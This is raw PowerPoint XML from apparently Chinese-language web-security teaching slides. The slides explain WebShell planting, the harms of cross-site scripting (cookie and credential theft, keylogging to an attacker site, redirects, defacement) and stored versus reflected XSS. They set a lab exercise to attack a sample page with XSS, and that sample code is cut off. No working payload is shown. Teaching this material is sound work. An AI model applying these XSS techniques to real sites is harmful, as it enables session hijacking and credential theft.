                <a:gd name="T0" fmla="*/ 385 w 386"/>
                <a:gd name="T1" fmla="*/ 322 h 334"/>
                <a:gd name="T2" fmla="*/ 199 w 386"/>
                <a:gd name="T3" fmla="*/ 4 h 334"/>
                <a:gd name="T4" fmla="*/ 193 w 386"/>
                <a:gd name="T5" fmla="*/ 0 h 334"/>
                <a:gd name="T6" fmla="*/ 186 w 386"/>
                <a:gd name="T7" fmla="*/ 4 h 334"/>
                <a:gd name="T8" fmla="*/ 1 w 386"/>
                <a:gd name="T9" fmla="*/ 322 h 334"/>
                <a:gd name="T10" fmla="*/ 1 w 386"/>
                <a:gd name="T11" fmla="*/ 330 h 334"/>
                <a:gd name="T12" fmla="*/ 7 w 386"/>
                <a:gd name="T13" fmla="*/ 334 h 334"/>
                <a:gd name="T14" fmla="*/ 378 w 386"/>
                <a:gd name="T15" fmla="*/ 334 h 334"/>
                <a:gd name="T16" fmla="*/ 385 w 386"/>
                <a:gd name="T17" fmla="*/ 330 h 334"/>
                <a:gd name="T18" fmla="*/ 386 w 386"/>
                <a:gd name="T19" fmla="*/ 326 h 334"/>
                <a:gd name="T20" fmla="*/ 385 w 386"/>
                <a:gd name="T21" fmla="*/ 322 h 334"/>
                <a:gd name="T22" fmla="*/ 218 w 386"/>
                <a:gd name="T23" fmla="*/ 113 h 334"/>
                <a:gd name="T24" fmla="*/ 212 w 386"/>
                <a:gd name="T25" fmla="*/ 240 h 334"/>
                <a:gd name="T26" fmla="*/ 180 w 386"/>
                <a:gd name="T27" fmla="*/ 240 h 334"/>
                <a:gd name="T28" fmla="*/ 174 w 386"/>
                <a:gd name="T29" fmla="*/ 113 h 334"/>
                <a:gd name="T30" fmla="*/ 218 w 386"/>
                <a:gd name="T31" fmla="*/ 113 h 334"/>
                <a:gd name="T32" fmla="*/ 196 w 386"/>
                <a:gd name="T33" fmla="*/ 305 h 334"/>
                <a:gd name="T34" fmla="*/ 196 w 386"/>
                <a:gd name="T35" fmla="*/ 305 h 334"/>
                <a:gd name="T36" fmla="*/ 171 w 386"/>
                <a:gd name="T37" fmla="*/ 279 h 334"/>
                <a:gd name="T38" fmla="*/ 196 w 386"/>
                <a:gd name="T39" fmla="*/ 254 h 334"/>
                <a:gd name="T40" fmla="*/ 221 w 386"/>
                <a:gd name="T41" fmla="*/ 279 h 334"/>
                <a:gd name="T42" fmla="*/ 196 w 386"/>
                <a:gd name="T43" fmla="*/ 3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6" h="334">
                  <a:moveTo>
                    <a:pt x="385" y="322"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="199" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="2"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="193" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="188" y="2"/>
                    <a:pt x="186" y="4"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="322"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="325"/>
                    <a:pt x="0" y="328"/>
                    <a:pt x="1" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="332"/>
                    <a:pt x="5" y="334"/>
                    <a:pt x="7" y="334"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="378" y="334"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="334"/>
                    <a:pt x="384" y="332"/>
                    <a:pt x="385" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="329"/>
                    <a:pt x="386" y="327"/>
                    <a:pt x="386" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="325"/>
                    <a:pt x="385" y="323"/>
                    <a:pt x="385" y="322"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="218" y="113"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="212" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="113"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="196" y="305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="196" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="305"/>
                    <a:pt x="171" y="294"/>
                    <a:pt x="171" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="264"/>
                    <a:pt x="181" y="254"/>
                    <a:pt x="196" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="254"/>
                    <a:pt x="221" y="264"/>
                    <a:pt x="221" y="279"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="294"/>
                    <a:pt x="211" y="305"/>
                    <a:pt x="196" y="305"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63DC942-CCC6-4133-9C2E-094D5AA50BA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8524853" y="3090372"/>
            <a:ext cx="2733577" cy="2398161"/>
            <a:chOff x="8859258" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="91" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58C201C8-1378-4DE5-BC0C-CE8294931C5F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8859258" y="3090372"/>
              <a:ext cx="2733577" cy="2398161"/>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92" name="文本框 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD33A36A-1B33-4C34-9689-4B288829BF96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8925690" y="3921525"/>
              <a:ext cx="2600712" cy="1477328"/>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dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>攻击者在受影响系统放置或者插入</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后</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>，可通过该</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>WebShell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>更</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>轻松，更隐蔽的在服务中为所欲为。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="attention-sign_108187">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5211708-E428-4D3E-8918-1676985CF079}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9921203" y="3201567"/>
              <a:ext cx="609685" cy="608764"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3413 w 6827"/>
                <a:gd name="T1" fmla="*/ 0 h 6827"/>
                <a:gd name="T2" fmla="*/ 0 w 6827"/>
                <a:gd name="T3" fmla="*/ 3413 h 6827"/>
                <a:gd name="T4" fmla="*/ 3413 w 6827"/>
                <a:gd name="T5" fmla="*/ 6827 h 6827"/>
                <a:gd name="T6" fmla="*/ 6827 w 6827"/>
                <a:gd name="T7" fmla="*/ 3413 h 6827"/>
                <a:gd name="T8" fmla="*/ 3413 w 6827"/>
                <a:gd name="T9" fmla="*/ 0 h 6827"/>
                <a:gd name="T10" fmla="*/ 3413 w 6827"/>
                <a:gd name="T11" fmla="*/ 5120 h 6827"/>
                <a:gd name="T12" fmla="*/ 2987 w 6827"/>
                <a:gd name="T13" fmla="*/ 4693 h 6827"/>
                <a:gd name="T14" fmla="*/ 3413 w 6827"/>
                <a:gd name="T15" fmla="*/ 4267 h 6827"/>
                <a:gd name="T16" fmla="*/ 3840 w 6827"/>
                <a:gd name="T17" fmla="*/ 4693 h 6827"/>
                <a:gd name="T18" fmla="*/ 3413 w 6827"/>
                <a:gd name="T19" fmla="*/ 5120 h 6827"/>
                <a:gd name="T20" fmla="*/ 3840 w 6827"/>
                <a:gd name="T21" fmla="*/ 3627 h 6827"/>
                <a:gd name="T22" fmla="*/ 2987 w 6827"/>
                <a:gd name="T23" fmla="*/ 3627 h 6827"/>
                <a:gd name="T24" fmla="*/ 2773 w 6827"/>
                <a:gd name="T25" fmla="*/ 1920 h 6827"/>
                <a:gd name="T26" fmla="*/ 2987 w 6827"/>
                <a:gd name="T27" fmla="*/ 1707 h 6827"/>
                <a:gd name="T28" fmla="*/ 3840 w 6827"/>
                <a:gd name="T29" fmla="*/ 1707 h 6827"/>
                <a:gd name="T30" fmla="*/ 4053 w 6827"/>
                <a:gd name="T31" fmla="*/ 1920 h 6827"/>
                <a:gd name="T32" fmla="*/ 3840 w 6827"/>
                <a:gd name="T33" fmla="*/ 3627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27" h="6827">
                  <a:moveTo>
                    <a:pt x="3413" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1528" y="0"/>
                    <a:pt x="0" y="1528"/>
                    <a:pt x="0" y="3413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5299"/>
                    <a:pt x="1528" y="6827"/>
                    <a:pt x="3413" y="6827"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5298" y="6827"/>
                    <a:pt x="6827" y="5299"/>
                    <a:pt x="6827" y="3413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6827" y="1528"/>
                    <a:pt x="5298" y="0"/>
                    <a:pt x="3413" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3413" y="5120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3178" y="5120"/>
                    <a:pt x="2987" y="4929"/>
                    <a:pt x="2987" y="4693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2987" y="4458"/>
                    <a:pt x="3178" y="4267"/>
                    <a:pt x="3413" y="4267"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3649" y="4267"/>
                    <a:pt x="3840" y="4458"/>
                    <a:pt x="3840" y="4693"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3840" y="4929"/>
                    <a:pt x="3649" y="5120"/>
                    <a:pt x="3413" y="5120"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3840" y="3627"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2987" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2773" y="1920"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2773" y="1802"/>
                    <a:pt x="2869" y="1707"/>
                    <a:pt x="2987" y="1707"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3840" y="1707"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3958" y="1707"/>
                    <a:pt x="4053" y="1802"/>
                    <a:pt x="4053" y="1920"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3840" y="3627"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C32B6BE6-64CE-4A64-9743-06AF1C526D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1514571" y="5748390"/>
            <a:ext cx="9969532" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>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这里需要特别说明的是上传漏洞的利用经常会使用</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，而</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的植入远不止文件上传这一种方式。</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928713"/>
            <a:ext cx="10657185" cy="494319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">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还可以轻易地实施下面的任何攻击：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D20323F5-5CCE-43D7-AA3E-45E51215EF96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5133231" y="2392189"/>
            <a:ext cx="2751702" cy="2974617"/>
            <a:chOff x="5053525" y="2801948"/>
            <a:chExt cx="2751702" cy="2974617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="图片 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB1C226-885D-4D63-AAF2-6111A7B65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9" name="椭圆 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75BF9947-D485-46C7-808A-B7BCC5BF40AC}"/>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JavaScript</a:t>
              </a:r>
            </a:p>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攻击</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0AC50F-402C-4F4C-A8F2-8CAF8E0C6D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4931174" y="2490048"/>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08E45D6F-2A2A-4C43-9E4E-140895AD3A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036473" y="2392189"/>
            <a:ext cx="3888432"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窃取实现会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B636533-433D-4704-BE22-60C80FD18B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4704027" y="385420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32EA6124-B2C3-46BA-AFB4-AADE7F4EEE0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036473" y="3602453"/>
            <a:ext cx="3661285" cy="702773"/>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按键记录，将所有输入的文本发送到攻击者网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B9B872C-F80C-412E-AA3C-A5F1AADE689E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5277247" y="5016722"/>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425CA040-5516-44AE-9813-A23EE687229E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903566" y="4959332"/>
            <a:ext cx="180020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网站涂改</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C27D726-2F6E-4743-A2E6-AA904AC3D1E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7761074" y="4982069"/>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FCAEA738-65E7-492B-B73B-4F857AB03C64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8351211" y="2392189"/>
            <a:ext cx="3888432"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向网页中注入链接或广告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A852FAD5-2F8A-4404-AB89-5C26E41D4D26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035775" y="375634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9BA2F948-CE9B-4C08-8082-C42D85009416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8114857" y="3648805"/>
            <a:ext cx="3661285" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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立即将网页重定向到恶意网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{746BEEAC-FD51-4014-A327-EDD5854F1F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8121126" y="2501009"/>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429EAA87-4874-4478-972F-BF8A1B9AF683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8035775" y="4879387"/>
            <a:ext cx="2354040"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窃取用户登录凭证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60305C2E-87E8-4AAC-86E5-250E02984378}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5975206" y="5626134"/>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45F3B49E-6A7B-4770-9D78-EA8F85729D13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6205132" y="5518597"/>
            <a:ext cx="3661285" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyP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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42596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52049" y="837929"/>
            <a:ext cx="2954655" cy="474140"/>
            <a:chOff x="4952049" y="837929"/>
            <a:chExt cx="2954655"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79381" y="1564097"/>
            <a:ext cx="10099988" cy="1938992"/>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一般来说，存储式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的风险会高于反射式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会保存在服务器上，有可能会跨页面存在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。它不改变页面</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的原有结构，因此有时候还能</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逃过一些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的检测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IE8</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Filter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Firefox</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Noscript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Extension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，都会检查地址栏中的地址是否包含</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脚本。而跨页面的存储式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可能会绕过这些检测工具。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251521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52049" y="837929"/>
            <a:ext cx="2954655" cy="474140"/>
            <a:chOff x="4952049" y="837929"/>
            <a:chExt cx="2954655"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952049" y="1312069"/>
              <a:ext cx="2954655"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52049" y="837929"/>
              <a:ext cx="2954655"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跨站脚本攻击的危害</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79381" y="1564097"/>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攻击过程</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来说，</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反射式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一般要求攻击者诱使用户点击一个包含</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存储式</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则只需让用户查看一个正常的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，而这个链接中存储了一段脚本。比如一个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邮箱的邮件正文页面存在一个存储式</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漏洞，当用户打开一封新邮件时，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 Payload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会被执行。这样的漏洞极其隐蔽，且埋伏在用户的正常业务中，风险颇高。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{458F07AC-1AD8-4172-99C1-D07EEF3FC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37" y="3719472"/>
            <a:ext cx="5019675" cy="2820042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200387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对如下示例代码的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网页进行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攻击，实现简单的弹窗效果即可</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实验三</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1172791" y="2220781"/>
            <a:ext cx="10873208" cy="4779920"/>
            <a:chOff x="2546904" y="2964184"/>
            <a:chExt cx="7848872" cy="7999528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="矩形 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F0C464-4B74-4C62-A523-8B32ECC5EBC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2899064" y="3190333"/>
              <a:ext cx="7144552" cy="7773379"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;!DOCTYPE html&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;head&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="x-none" altLang="zh-CN" sz="2400" dirty="0"/>
                <a:t>&lt;meta http-equiv="content-type" content="text/html;charset=utf-8"&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
            </a:p>
            <a:p>
              <a:r>
